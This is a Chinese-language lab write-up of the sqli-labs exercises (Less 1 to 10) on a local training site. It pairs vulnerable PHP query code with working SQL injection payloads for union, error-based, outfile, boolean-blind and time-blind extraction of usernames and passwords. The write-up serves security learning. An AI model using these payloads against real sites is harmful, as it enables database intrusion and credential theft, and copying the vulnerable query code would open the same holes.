SQLI-LAB 的实战记录(Less 1 - Less 10)

以下内容只是本人在做 sqli-lab 练习时写下的记录，仅供参考。因为本人学过一些sql注入的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

Less - 1 Error Based- String

（第1节：基于错误 – 字符串）

字符型注入，也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住

Test:

    http://localhost/sqli-lab/Less-1/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1 注：报错中limit前面的是 '2'' 对比URL上的 2'，可推断，php的sql语句中 $id 可能被单引号包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
 } else {
    print_r(mysql_error());
}

注：id被单引号包裹；不报错的时候，会显示username和password这两个位置的内容

Solution：

' or '1'='1
    http://localhost/sqli-lab/Less-1/index.php?id=1' or '1'='1

'  --+
    http://localhost/sqli-lab/Less-1/index.php?id= 1'  --+

     其它：

    http://localhost/sqli-lab/Less-1/index.php?id=0' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-1/index.php?id= ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1

    http://localhost/sqli-lab/Less-1/index.php?id=0 ' union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 2 Error Based- Intiger

（第2课：基于错误 – 数字型）

Test:

    http://localhost/sqli-lab/Less-2/index.php?id=2"/

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/ LIMIT 0,1' at line 1 注：报错中limit前面的是 "/ 和URL上的一样，可推断，php的sql语句中 $id 可能没有被其它符号包裹

Sourse Code：

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：id被双引号包裹；不报错的时候，会显示username和password这两个位置的内容

Solution：

or 1=1
     http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1

or 1=1 --
    http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1 --

--+
    http://localhost/sqli-lab/Less-2/index.php?id= 1 --+

     其它：

    http://localhost/sqli-lab/Less-2/index.php?id= 0 union select 1,version(),database()

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users

    补充：

暴用户名、版本号、库名和路径
    http://localhost/sqli-lab/Less-2/index.php?id=0  union select 1,2,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir) --+

暴所在库的所有表名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

暴列名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

暴username和password的内容
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username,0x5e,password),3 from users --

Less - 3 Error Based- String (with Twist)

（第3课：基于错误- 字符串（变形））

Test:

    http://localhost/sqli-lab/Less-3/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

    http://localhost/sqli-lab/Less-3/index.php?id=1' or 1=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1 注：报错中出现 ') 推断SQL语句中应有 ('$id')存在

Sourse Code：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注：被('') 包裹

Solution：

') or '1'=('1
     http://localhost/sqli-lab/Less-3/index.php?id=1 ') or '1'=('1

) or 1=1 --+
     http://localhost/sqli-lab/Less-3/index.php?id=1) or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 4 Error Based- DoubleQuotes String

（第4课：基于错误 - 双引号字符串）

Test:

    http://localhost/sqli-lab/Less-4/index.php?id=2"/

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") LIMIT 0,1' at line 1
 注： 报错中limit前面的是 ") 对比URL上的 2"/，可推断，php的sql语句中 $id 是被 双引号和一层括号 包裹

Sourse Code：

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo "<font size='5' color= '#99FF00'>";
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
}else{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>"; 
}

注：加了一层双引号和括号

Solution：

")or ("1")=("1
    http://localhost/sqli-lab/Less-4/index.php?id=1")or ("1")=("1

")or 1=1 --+
    http://localhost/sqli-lab/Less-4/index.php?id=1")or 1=1 --+

     其它：

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 5 Double Query- Single Quotes- String

（第5课：双注入 - 单引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-5/index.php?id=2"/

注：未报错，只显示 You are in...........

    http://localhost/sqli-lab/Less-5/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' -- ' LIMIT 0,1' at line 1 注：能正常报错，考虑使用报错来获取信息，同时 limit前为 "'--' 可以推断 $id是用单引号包裹的

双注入查询需要四个函数/语句

      1. Rand() //随机函数
      2. Floor() //取整函数
      3. Count() //汇总函数
      4. Group by clause //分组语句 
  双注入的原理，简单一句话原理就是有研究人员发现，当在一个聚合函数，比如count函数后面如果使用分组语句（group by）就会把查询的一部分以错误的形式显示出来“通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性，即可能为0也可能为1（group by key的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则不在临时表中则更新临时表中的数据；如果该key不存在于临时表中，则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数，检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0，如果此时临时表只有key为1的行不存在key为0的行，那么数据库要将该条记录插入临时表，由于是随机数，插时又要计算一下随机值，此时floor(random(0)*2)结果可能为1，就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。具体原理参考：http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html）。”

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被单引号包围，URL正确时除可能知道格式外，无法获取其它信息；错误时有正常报错，可以考虑从报错入手

Solution：

' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    其它：

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    版本号：：数据库名：：用户名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    表名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    列名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    行数
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第一行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第二行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第三行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第四行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第五行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第六行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第七行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第八行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

注：如果没有现成的注入语句，建议使用mysql逐步测试出可用的语句

Less - 6 Double Query- Double Quotes- String

（第6课：双注入 - 双引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-6/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' -- " LIMIT 0,1' at line 1 注：能正常报错， limit前是 ' -- " ，推断 $id 是被双引号包裹

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注：$id被双引号包围，URL正确时除可能知道格式外，无法获取其它信息；错误时有正常报错，可以考虑从报错入手

Solution：

" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

     其它：

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+


    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns wheretable_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

Less - 7 Dump into Outfile

（第7课：转储文件）

Test:

    http://localhost/sqli-lab/Less-7/index.php?id=2

You are in.... Use outfile...... 注：和之前一样正常时除可能的格式和提示的使用 outfile以外，无其它有效信息

    http://localhost/sqli-lab/Less-7/index.php?id=2' --+

You have an error in your SQL syntax 注：得不到详细的报错

    http://localhost/sqli-lab/Less-7/index.php?id=2')) --+

注：正常，$id周围应是单引号和双层括号

Sourse Code：

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

注：$id被双层括号和单引号包围，URL正确时有提示用outfile，错误时只知有错误

Solution：

2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     http://localhost/sqli-lab/Less-7/index.php?id=2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     其它：

    http://localhost/sqli-lab/Less-7/index.php?id=2')) union select username,'~~',password from users into outfile  "F:\\666.txt" --+

（第8课：盲注 - 基于布尔值 - 单引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-8/index.php?id=2'

注：什么都没有显示，加上括号也不行

    http://localhost/sqli-lab/Less-8/index.php?id=2' --+

You are in........... 注：根据前几次的经验，这句话说明能查出，没有报错，那么之前那个估计是错了

    http://localhost/sqli-lab/Less-8/index.php?id=2"

You are in........... 注：没报错，双引号加上或改成括号也都没错，看来$id是被单引号圈着了因为除了对错什么都判断不出来，所以考虑构造只需判断对错的语句，盲注

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 116 --+

注：正确。substr(待截断的字符串，开始位置，截断长度)

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 115 --+

注：没显示，则这是错的，对照ascii，也说明数据库第一个字符是小写的s

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}

Solution：

2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

     其它：

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length(database())) = 8 --+

注：数库名长度=8

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,8,1))) = 121 --+  

注：数据库名 security

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 101 --+

注：第一张表 表名长度=6，第一个字符是 e

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

注：第四张表是users

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

注：users表第一行 的username 第一个字母 D

（第9课：盲注 - 基于时间 - 单引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-9/index.php?id=2

    http://localhost/sqli-lab/Less-9/index.php?id=2'

    http://localhost/sqli-lab/Less-9/index.php?id=2"

    http://localhost/sqli-lab/Less-9/index.php?id=2')

都只显示 You are in...........这情况八成是要盲注，仅单纯的布尔值是不行了（感谢这道题在提示是基于时间的。。。）

Sourse Code：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

    http://localhost/sqli-lab/Less-9/index.php?id=1'+and+if(1=1, sleep(1), null)+ --+

注：说明 and 前面是对的，会停1秒   

     其它：

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

（第10课：盲注 - 基于时间 - 双引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-10/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：这个跳得挺快的，and前面是写错了

     http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注：这个对了

Sourse Code：

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution：

2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+ 

     其它：

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 +and+if(1=1, sleep(1), null)+ --+

SQLI-LAB 的 实战记录(Less 1 - Less 10)

Less - 1 Error Based- String

Test:

Sourse Code：

Solution：

Less - 2 Error Based- Intiger

Test:

Sourse Code：

Solution：

Less - 3 Error Based- String (with Twist)

Test:

Sourse Code：

Solution：

Less - 4 Error Based- DoubleQuotes String

Test:

Sourse Code：

Solution：

Less - 5 Double Query- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 6 Double Query- Double Quotes- String

Test:

Sourse Code：

Solution：

Less - 7 Dump into Outfile

Test:

Sourse Code：

Solution：

Less - 8 Blind- Boolian- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 9 Blind- Time based- Single Quotes- String

Test:

Sourse Code：

Solution：

Less - 10 Blind- Time based- Double Quotes- String

Test:

Sourse Code：

Solution：

results matching ""

No results matching ""

SQLI-LAB 的实战记录(Less 1 - Less 10)